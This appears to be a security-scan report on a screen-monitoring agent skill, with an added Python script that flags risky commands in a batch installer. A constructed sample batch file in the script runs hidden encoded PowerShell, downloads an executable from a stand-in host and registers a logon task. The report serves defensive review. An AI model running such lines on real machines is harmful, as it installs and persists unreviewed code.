Skill v1.0.1

ClawScan security

Helps you stay focused. Currently only supports Chinese.

ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Scanned: Mar 10, 2026, 1:59 PM
Verdict: suspicious
Confidence: medium
Model: gpt-5-mini
Summary
The skill's actions generally match its stated purpose (local screenshot monitoring and history queries), but it instructs the agent to clone and run external code (start.bat) and to read local screenshots. Both require careful review and explicit user consent before installation or execution.
Guidance
This skill's behavior is coherent with a local screen-monitoring tool, but it asks you (or the agent) to clone a GitHub repository and run start.bat, which can execute arbitrary code on the host with your privileges. Before installing or running:
1) Require explicit user consent for any monitoring, and confirm how long screenshots are kept and where.
2) Manually review the GitHub repository and read start.bat and any scripts it invokes before executing anything; do not rely on the host name or the repository's popularity as a substitute for reading the code.
3) Where possible, run the service in a sandbox, a disposable VM, or an isolated account rather than on your main workstation.
4) Limit where screenshots are stored and who can read that folder.
5) Require textual confirmation from the user before the agent performs any clone or run action; do not allow automatic installation.
If you cannot review the repository or do not trust it, do not run start.bat and do not let the agent perform the git clone.

Review Dimensions

Purpose & Capability: ok
The name and description claim local visual monitoring, focus scoring, and history queries; the instructions consistently reference local data under ~/Desktop/FocusOS_Data, endpoints on localhost (127.0.0.1:8765), and CSV/JPG artifacts. These requirements are consistent with a screen-monitoring/focus tool.
Instruction Scope: note
SKILL.md instructs the agent to read local data directories (CSV and JPG files), call a local HTTP API, and proceed only once user consent has been obtained. Reading local screenshots and timestamps is expected for the stated purpose but is highly privacy-sensitive; the instructions' emphasis on consent is appropriate. There are minor inconsistencies between the examples (PowerShell Test-Path versus Python os.path checks), but nothing that changes intent.
Install Mechanism: concern
Although this is an instruction-only skill with no built-in install spec, the instructions tell the user or agent to git clone https://github.com/HR2AY/focusAI and run start.bat. Downloading and executing a remote repository's startup script is hazardous because that script can run arbitrary commands on the host with the user's privileges, and because the repository is not pinned to a commit: its contents can change between the time of this review and the time it is cloned. Hosting on GitHub is no assurance of safety. Cloning and running an unreviewed startup script carries non-trivial risk; audit the script manually and pin the checkout to the commit you reviewed before executing it.
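Guidance step 2 and the Install Mechanism concern both come down to reading start.bat before anything runs it. The script below is an added example for this report, not code from ClawHub, the skill, or the focusAI repository. It performs a static pre-execution triage of a Windows batch installer: it strips cmd.exe caret escapes (so p^owershell is seen as powershell), skips comment lines, and flags the primitives an installer needs in order to fetch and run code beyond what it ships with, run hidden or encoded PowerShell, persist across logins, or bind the local service to something other than 127.0.0.1. The two embedded sample scripts are constructed for illustration and are not the real start.bat; the rule names, the example.invalid URL, and the FocusAI task name are assumptions.

```python
"""Static pre-execution triage of a Windows batch installer such as start.bat.

Added example for this scan report, not code from ClawHub, the skill or the focusAI
repository. The embedded sample scripts are constructed and are NOT the real start.bat.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    text: str


# One rule per thing an installer must not do unread: pull code from the network,
# run hidden/encoded PowerShell, evaluate strings as code, launch LOLBins, persist
# across logins, expose the service beyond loopback, weaken defenses or elevate.
RULES = [
    ("remote-download", re.compile(
        r"\b(curl|wget|bitsadmin|Invoke-WebRequest|iwr|Start-BitsTransfer)\b"
        r"|certutil\b.*-urlcache|New-Object\s+Net\.WebClient", re.I)),
    ("encoded-or-hidden-powershell", re.compile(
        r"powershell(\.exe)?\b.*(\s-(e|ec|enc|encodedcommand)\b|\s-w(indowstyle)?\s+hidden\b)", re.I)),
    ("dynamic-eval", re.compile(
        r"\b(Invoke-Expression|iex)\b|\|\s*(cmd|powershell)(\.exe)?(\s|$)", re.I)),
    ("lolbin-exec", re.compile(r"\b(mshta|rundll32|regsvr32|wmic)\b|msiexec\b.*https?://", re.I)),
    ("persistence", re.compile(
        r"\bschtasks\b.*/create|\breg\s+add\b.*\\run\b|\bsc\s+create\b|\\Startup\\", re.I)),
    ("network-exposure", re.compile(r"\b0\.0\.0\.0\b|\[::\]|netsh\s+advfirewall\b", re.I)),
    ("defense-or-privilege-change", re.compile(
        r"\b(Set-MpPreference|Add-MpPreference|DisableRealtimeMonitoring)\b"
        r"|net\s+localgroup\s+administrators|icacls\b.*everyone", re.I)),
]
# Any hit here means: do not run until a human has read and understood the script.
HARD_STOP = {name for name, _ in RULES} - {"network-exposure"}


def _code_lines(text: str):
    """Yield (line_no, line) for executable lines with cmd.exe caret escapes removed.

    cmd.exe treats ^ as an escape, so "p^owershell" runs powershell; stripping carets
    un-hides such keywords. REM and :: comment lines are skipped. Caret line
    continuations are not joined, so a command split across lines can be missed.
    """
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.replace("^", "")
        head = line.strip().lower()
        if not head or head.startswith(("rem ", "@rem ", "::")) or head in ("rem", "@rem"):
            continue
        yield n, line


def audit_batch(text: str) -> list[Finding]:
    """Return one Finding per (line, rule) match, in file order."""
    return [Finding(n, rule, line.strip())
            for n, line in _code_lines(text) for rule, rx in RULES if rx.search(line)]


def binds_localhost_only(text: str) -> bool:
    """True when the script names a loopback address and never a wildcard bind."""
    loopback = re.search(r"127\.0\.0\.1|\blocalhost\b", text, re.I) is not None
    return loopback and not any(f.rule == "network-exposure" for f in audit_batch(text))


def triage(text: str) -> tuple[str, list[Finding]]:
    """Collapse findings into a decision: do-not-run, review or no-red-flags."""
    findings = audit_batch(text)
    if any(f.rule in HARD_STOP for f in findings):
        return "do-not-run", findings
    return ("review" if findings else "no-red-flags"), findings


# Constructed sample: only what SKILL.md describes (venv, local deps, 127.0.0.1:8765).
SAMPLE_BENIGN = r"""@echo off
:: constructed sample, not the real focusAI start.bat
cd /d %~dp0
if not exist "%USERPROFILE%\Desktop\FocusOS_Data" mkdir "%USERPROFILE%\Desktop\FocusOS_Data"
python -m venv .venv
call .venv\Scripts\activate.bat
pip install -r requirements.txt
python server.py --host 127.0.0.1 --port 8765
"""
# Constructed sample with the red flags a reviewer must catch: caret-obfuscated,
# hidden, encoded PowerShell; a download; a logon task; a wildcard bind.
SAMPLE_SUSPICIOUS = r"""@echo off
REM constructed sample with red flags, not the real start.bat
cd /d %~dp0
p^owershell -nop -w hidden -enc QQBCAEMA
curl -s https://example.invalid/helper.exe -o %TEMP%\helper.exe
schtasks /create /tn FocusAI /tr "%TEMP%\helper.exe" /sc onlogon
python server.py --host 0.0.0.0 --port 8765
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_SUSPICIOUS
    verdict, findings = triage(text)
    for f in findings:
        print(f"line {f.line_no:>3}  {f.rule:<29}  {f.text}")
    print(f"verdict: {verdict}; loopback-only: {binds_localhost_only(text)}")
```

Point it at the cloned file (python triage_bat.py focusAI\start.bat) before deciding whether to run it. On the constructed suspicious sample it reports do-not-run with four rules hit on lines 4 to 7 (remote-download, encoded-or-hidden-powershell, persistence, network-exposure) and loopback-only False; the benign sample reports no-red-flags and loopback-only True. A clean result is a reason to read the script, not a licence to skip reading it: batch variable tricks such as %x%owershell, commands assembled across caret continuation lines, and anything the script fetches at run time are outside what this pattern list can see.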
Credentials: ok
The skill declares no required environment variables, binaries, or config paths beyond the local data directory. The requested filesystem and localhost access are proportional to a screen-monitoring tool. No unrelated credentials or broad cloud permissions are requested.
Persistence & Privilege: ok
The skill does not request always:true and does not declare modifications to other skills or global agent settings. It describes starting and stopping a local service (FocusAI) but does not demand permanent platform-level privileges.